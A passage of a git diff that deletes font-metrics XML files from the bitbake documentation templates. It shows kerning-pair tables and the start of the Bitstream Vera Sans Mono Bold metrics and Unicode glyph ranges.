kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-21" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-44" kpx2="68"/><pair kern="-63" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-17" kpx2="250"/><pair kern="-17" kpx2="127"/><pair kern="-44" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-17" kpx2="81"/><pair kern="-21" kpx2="76"/><pair kern="18" kpx2="181"/><pair kern="-155" kpx2="17"/><pair kern="-17" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-44" kpx2="109"/><pair kern="-160" kpx2="197"/><pair kern="-35" 
kpx2="121"/><pair kern="-17" kpx2="228"/><pair kern="-44" kpx2="110"/><pair kern="-63" kpx2="174"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="104"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="72"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="199"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="54"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" 
kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="180"><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="246"/><pair kern="-30" kpx2="43"/><pair kern="-72" kpx2="123"/><pair kern="-35" kpx2="251"/><pair kern="-35" kpx2="208"/><pair kern="-188" kpx2="144"/><pair kern="-58" kpx2="59"/><pair kern="-35" kpx2="73"/><pair kern="-30" kpx2="41"/><pair kern="-72" kpx2="124"/><pair kern="-54" kpx2="85"/><pair kern="-128" kpx2="201"/><pair kern="-17" kpx2="61"/><pair kern="-35" kpx2="100"/><pair kern="-72" kpx2="122"/><pair kern="-30" kpx2="47"/><pair kern="-35" kpx2="210"/><pair kern="-72" kpx2="82"/><pair kern="-35" kpx2="186"/><pair kern="-35" kpx2="175"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="-128" kpx2="98"/><pair kern="-54" kpx2="81"/><pair kern="-17" kpx2="229"/><pair kern="-35" kpx2="38"/><pair kern="-72" kpx2="121"/><pair kern="-30" kpx2="37"/><pair kern="-54" kpx2="120"/><pair kern="-30" kpx2="51"/><pair kern="-128" kpx2="199"/><pair kern="-30" kpx2="53"/><pair kern="-30" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-35" kpx2="253"/><pair kern="-35" kpx2="52"/><pair kern="-72" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-35" kpx2="90"/><pair kern="-128" kpx2="36"/><pair kern="-35" kpx2="50"/><pair kern="-30" kpx2="39"/><pair kern="-30" kpx2="236"/><pair kern="-30" kpx2="45"/><pair kern="-128" kpx2="173"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="89"/><pair kern="-30" kpx2="46"/><pair kern="-128" kpx2="174"/></kerning><kerning kpx1="53"><pair kern="-21" kpx2="107"/><pair kern="-54" kpx2="235"/><pair kern="-40" kpx2="16"/><pair kern="-44" kpx2="112"/><pair kern="-44" kpx2="123"/><pair kern="-49" kpx2="251"/><pair kern="-44" kpx2="113"/><pair kern="-63" kpx2="187"/><pair kern="-44" kpx2="129"/><pair kern="-44" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-63" kpx2="60"/><pair kern="-40" kpx2="201"/><pair kern="-21" kpx2="106"/><pair 
kern="-30" kpx2="29"/><pair kern="-63" kpx2="234"/><pair kern="-49" kpx2="100"/><pair kern="-44" kpx2="122"/><pair kern="-21" kpx2="68"/><pair kern="-40" kpx2="58"/><pair kern="-44" kpx2="82"/><pair kern="-54" kpx2="186"/><pair kern="-40" kpx2="98"/><pair kern="-63" kpx2="181"/><pair kern="-35" kpx2="17"/><pair kern="-49" kpx2="38"/><pair kern="-44" kpx2="121"/><pair kern="-54" kpx2="57"/><pair kern="-44" kpx2="126"/><pair kern="-44" kpx2="72"/><pair kern="-40" kpx2="199"/><pair kern="-72" kpx2="180"/><pair kern="-21" kpx2="105"/><pair kern="-49" kpx2="253"/><pair kern="-44" kpx2="125"/><pair kern="-44" kpx2="115"/><pair kern="-17" kpx2="170"/><pair kern="-44" kpx2="88"/><pair kern="-40" kpx2="36"/><pair kern="-44" kpx2="114"/><pair kern="-72" kpx2="55"/><pair kern="-44" kpx2="127"/><pair kern="-21" kpx2="108"/><pair kern="-44" kpx2="128"/><pair kern="-40" kpx2="173"/><pair kern="-21" kpx2="109"/><pair kern="-54" kpx2="92"/><pair kern="-17" kpx2="197"/><pair kern="-21" kpx2="110"/><pair kern="-40" kpx2="174"/></kerning><kerning kpx1="137"><pair kern="-54" kpx2="180"/><pair kern="-40" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="233"><pair kern="-44" kpx2="180"/><pair kern="-35" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="253"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="211"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="78"><pair kern="-17" kpx2="107"/><pair kern="-30" kpx2="126"/><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="72"/><pair kern="-35" kpx2="112"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="105"/><pair kern="-30" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-30" 
kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-35" kpx2="186"/><pair kern="-30" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-30" kpx2="128"/><pair kern="-17" kpx2="109"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-17" kpx2="110"/></kerning><kerning kpx1="52"><pair kern="-21" kpx2="180"/><pair kern="-63" kpx2="197"/><pair kern="27" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="125"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="42"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="170"><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="199"/><pair kern="-17" kpx2="251"/><pair kern="-109" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-54" kpx2="59"/><pair kern="-109" kpx2="60"/><pair kern="-35" kpx2="201"/><pair kern="-17" kpx2="253"/><pair kern="-109" kpx2="234"/><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="210"/><pair kern="-35" kpx2="36"/><pair kern="-54" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-17" kpx2="39"/><pair kern="-35" kpx2="98"/><pair kern="-17" kpx2="45"/><pair kern="-35" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="89"/><pair kern="-86" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="174"/></kerning><kerning kpx1="115"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="90"><pair 
kern="-91" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-104" kpx2="197"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="36"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="55"><pair kern="-165" kpx2="107"/><pair kern="-155" kpx2="235"/><pair kern="-91" kpx2="16"/><pair kern="-169" kpx2="112"/><pair kern="-169" kpx2="123"/><pair kern="-58" kpx2="251"/><pair kern="-169" 
kpx2="113"/><pair kern="-165" kpx2="86"/><pair kern="-151" kpx2="129"/><pair kern="-169" kpx2="124"/><pair kern="-91" kpx2="169"/><pair kern="-169" kpx2="252"/><pair kern="-169" kpx2="70"/><pair kern="-146" kpx2="85"/><pair kern="-77" kpx2="201"/><pair kern="-165" kpx2="106"/><pair kern="-109" kpx2="29"/><pair kern="-58" kpx2="100"/><pair kern="-169" kpx2="122"/><pair kern="-165" kpx2="68"/><pair kern="-169" kpx2="82"/><pair kern="-155" kpx2="186"/><pair kern="-165" kpx2="250"/><pair kern="-77" kpx2="98"/><pair kern="-21" kpx2="181"/><pair kern="-118" kpx2="17"/><pair kern="-58" kpx2="38"/><pair kern="-169" kpx2="121"/><pair kern="-165" kpx2="228"/><pair kern="-169" kpx2="254"/><pair kern="-151" kpx2="126"/><pair kern="-169" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-165" kpx2="105"/><pair kern="-58" kpx2="253"/><pair kern="-169" kpx2="125"/><pair kern="-169" kpx2="115"/><pair kern="-54" kpx2="170"/><pair kern="-151" kpx2="88"/><pair kern="-169" kpx2="111"/><pair kern="-165" kpx2="90"/><pair kern="-77" kpx2="36"/><pair kern="-17" kpx2="55"/><pair kern="-169" kpx2="114"/><pair kern="-151" kpx2="127"/><pair kern="-165" kpx2="108"/><pair kern="-30" kpx2="76"/><pair kern="-151" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-165" kpx2="109"/><pair kern="-155" kpx2="92"/><pair kern="-128" kpx2="197"/><pair kern="-165" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="114"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="50"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" 
kpx2="234"/></kerning><kerning kpx1="91"><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="111"/><pair kern="-30" kpx2="122"/><pair kern="-30" kpx2="82"/><pair kern="-30" kpx2="114"/><pair kern="-30" kpx2="72"/><pair kern="-30" kpx2="112"/><pair kern="-30" kpx2="123"/><pair kern="-30" kpx2="113"/><pair kern="-30" kpx2="124"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-30" kpx2="121"/><pair kern="-30" kpx2="125"/><pair kern="-30" kpx2="115"/></kerning><kerning kpx1="39"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="-17" kpx2="98"/><pair kern="-54" kpx2="187"/><pair kern="-26" kpx2="181"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="236"><pair kern="-17" kpx2="180"/><pair kern="-72" kpx2="17"/><pair kern="-91" kpx2="197"/><pair kern="-35" kpx2="29"/></kerning><kerning kpx1="45"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="169"/><pair kern="-54" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="199"/><pair kern="-35" kpx2="16"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="173"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" 
kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="197"><pair kern="-35" kpx2="246"/><pair kern="-54" kpx2="235"/><pair kern="-35" kpx2="43"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-183" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="18" kpx2="144"/><pair kern="-35" kpx2="59"/><pair kern="-17" kpx2="73"/><pair kern="-35" kpx2="41"/><pair kern="-35" kpx2="124"/><pair kern="-35" kpx2="85"/><pair kern="-183" kpx2="60"/><pair kern="18" kpx2="201"/><pair kern="-183" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-35" kpx2="122"/><pair kern="-35" kpx2="47"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="82"/><pair kern="-123" kpx2="58"/><pair kern="-54" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-35" kpx2="81"/><pair kern="18" kpx2="98"/><pair kern="-54" kpx2="38"/><pair kern="-35" kpx2="121"/><pair kern="-183" 
kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="120"/><pair kern="-35" kpx2="51"/><pair kern="18" kpx2="199"/><pair kern="-35" kpx2="53"/><pair kern="-35" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-54" kpx2="253"/><pair kern="-54" kpx2="52"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-95" kpx2="90"/><pair kern="18" kpx2="36"/><pair kern="-137" kpx2="55"/><pair kern="-54" kpx2="50"/><pair kern="-35" kpx2="39"/><pair kern="-35" kpx2="236"/><pair kern="22" kpx2="45"/><pair kern="18" kpx2="173"/><pair kern="-54" kpx2="92"/><pair kern="-114" kpx2="89"/><pair kern="-35" kpx2="46"/><pair kern="18" kpx2="174"/></kerning><kerning kpx1="92"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="89"><pair kern="-77" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-132" kpx2="197"/><pair kern="-26" kpx2="16"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="46"><pair kern="-17" kpx2="107"/><pair kern="-72" kpx2="235"/><pair kern="-104" kpx2="16"/><pair kern="-49" kpx2="112"/><pair kern="-49" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-26" kpx2="213"/><pair kern="-49" kpx2="113"/><pair kern="-35" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="-49" kpx2="129"/><pair kern="-49" kpx2="124"/><pair kern="-63" kpx2="169"/><pair kern="-35" kpx2="60"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-49" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-49" kpx2="82"/><pair kern="-72" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-26" kpx2="212"/><pair 
kern="-54" kpx2="38"/><pair kern="-49" kpx2="121"/><pair kern="-49" kpx2="126"/><pair kern="-26" kpx2="104"/><pair kern="-49" kpx2="72"/><pair kern="-17" kpx2="199"/><pair kern="-30" kpx2="180"/><pair kern="-17" kpx2="105"/><pair kern="-54" kpx2="253"/><pair kern="-26" kpx2="211"/><pair kern="-49" kpx2="125"/><pair kern="-49" kpx2="115"/><pair kern="-49" kpx2="88"/><pair kern="-17" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-49" kpx2="114"/><pair kern="-54" kpx2="50"/><pair kern="-49" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-49" kpx2="128"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="109"/><pair kern="-72" kpx2="92"/><pair kern="-17" kpx2="110"/><pair kern="-17" kpx2="174"/><pair kern="-26" kpx2="56"/></kerning><kerning kpx1="174"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" 
kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="56"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning></font-metrics> \ No newline at end of file
diff --git a/bitbake/doc/template/VeraMoBd.xml b/bitbake/doc/template/VeraMoBd.xml
deleted file mode 100644
index 9b33107a44..0000000000
--- a/bitbake/doc/template/VeraMoBd.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Bold</font-name><full-name>Bitstream Vera Sans Mono Bold</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-19</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" 
ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" 
